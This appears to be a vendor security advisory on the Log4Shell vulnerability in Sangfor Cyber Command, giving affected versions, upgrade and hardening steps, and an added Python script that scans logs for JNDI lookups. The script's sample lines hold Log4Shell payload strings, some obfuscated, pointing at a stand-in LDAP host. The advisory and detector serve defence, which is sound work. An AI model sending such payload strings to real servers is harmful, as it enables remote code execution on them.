[CC] Apache Log4j2 Remote Code Execution

Posted by CTI SC (Lv2) on 29 Dec 2021 16:47

Last edited by CTI SC 29 Dec 2021 16:48.

Product warning background:
Vulnerability Overview
On 10 December 2021, the Apache Log4j2 Remote Code Execution (RCE) vulnerability (CVE-2021-44228), also known as Log4Shell, was announced. This vulnerability exists in some previous versions of Sangfor Cyber Command. Attackers can exploit it to execute code remotely and gain total access to the Cyber Command server. Sangfor has released a patch for this vulnerability.

No other Sangfor Products including IAG, NGAF, Endpoint Secure, HCI, VDI, SSLVPN, WANO and CM are affected at this time.

Versions and Fix
The vulnerability affects Sangfor Cyber Command versions before v3.0.50; version 3.0.50 and newer are not affected. It can be mitigated by upgrading Cyber Command to v3.0.50 or v3.0.59. For customers who have "Allow Automatic Updates" enabled, Cyber Command will have installed the update automatically if it is online. For customers who do not have automatic updates enabled, Cyber Command needs to be updated manually by installing this patch.

Consequences
Attackers can use this vulnerability to execute arbitrary code on Cyber Command, potentially giving them complete access to the server.

Vulnerability Introduction
The Apache log4j library used by Cyber Command allows developers to log various data within their application. In certain circumstances, the data being logged originates from user input. If that user input contains special lookup characters and is logged through log4j, the library's lookup mechanism is invoked and loads an attacker-defined Java class from a remote LDAP server. This in turn leads to RCE on Cyber Command.
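A defender-side check for the lookup syntax described above, added here as an example and not part of the Sangfor advisory or of Cyber Command: it scans log lines for a JNDI lookup, collapsing the nested `${lower:...}`, `${upper:...}` and `${...:-...}` lookups that are commonly used to disguise it. The log lines and the 203.0.113.0/24 addresses are constructed for the demo.

```python
import re

# Constructed sample log lines for the demo; they are not from the advisory
# or from any real Cyber Command log. 203.0.113.0/24 is a documentation range.
SAMPLE_LOG = [
    '10.0.0.5 "GET /login HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 "GET / HTTP/1.1" 200 "${${lower:j}ndi:${::-l}dap://203.0.113.7/b}"',
    '10.0.0.12 "POST /api HTTP/1.1" 200 "${env:HOME}"',
]

# Innermost ${...} expression, i.e. one with no further braces inside it.
INNER = re.compile(r'\$\{([^{}]*)\}')
# What a JNDI lookup looks like once the disguising lookups are collapsed.
JNDI = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)


def _collapse(m):
    """Replace a letter-hiding lookup by the text it evaluates to.

    ${lower:X} / ${upper:X} -> x ; ${::-X} and ${name:-X} (default value) -> X.
    Any other lookup (jndi:, env:, ...) is returned unchanged.
    """
    body = m.group(1)
    if ':-' in body:
        return body.split(':-', 1)[1]
    name, sep, value = body.partition(':')
    if sep and name.strip().lower() in ('lower', 'upper'):
        return value.lower()
    return m.group(0)


def normalize(text):
    """Collapse nested lookups from the inside out until nothing changes."""
    prev = None
    while prev != text:
        prev, text = text, INNER.sub(_collapse, text)
    return text


def scan(lines):
    """Return (line number, normalized line) for each line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        if JNDI.search(norm):
            hits.append((n, norm))
    return hits


if __name__ == '__main__':
    for n, norm in scan(SAMPLE_LOG):
        print(f'line {n}: {norm}')
```

The check is intended as a triage aid for logs already collected; it does not replace upgrading to a fixed version.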

Precautions & Measures
1. Upgrade Cyber Command to version 3.0.50 or later.
2. Enable automatic updates.
3. Make sure that Internet-facing console access to Cyber Command is turned off. If remote operation and maintenance is required, first connect to the intranet through an SSL VPN or another secure method.
4. Set a whitelist restriction for the login IP address to Cyber Command, allowing access only to security operation and maintenance personnel.

Download the Current Version of Cyber Command
Download the following from the Sangfor Cyber Command Community Download page: https://community.sangfor.com/plugin.php?id=service:download&action=view&fid=92#/34/all

1. Upgrade file for Cyber Command version 3.0.49 and below
2. Latest patch file for Cyber Command
3. Full installation file for the latest version of Cyber Command

Source of vulnerability: National Vulnerability Database (NVD), CVE-2021-44228
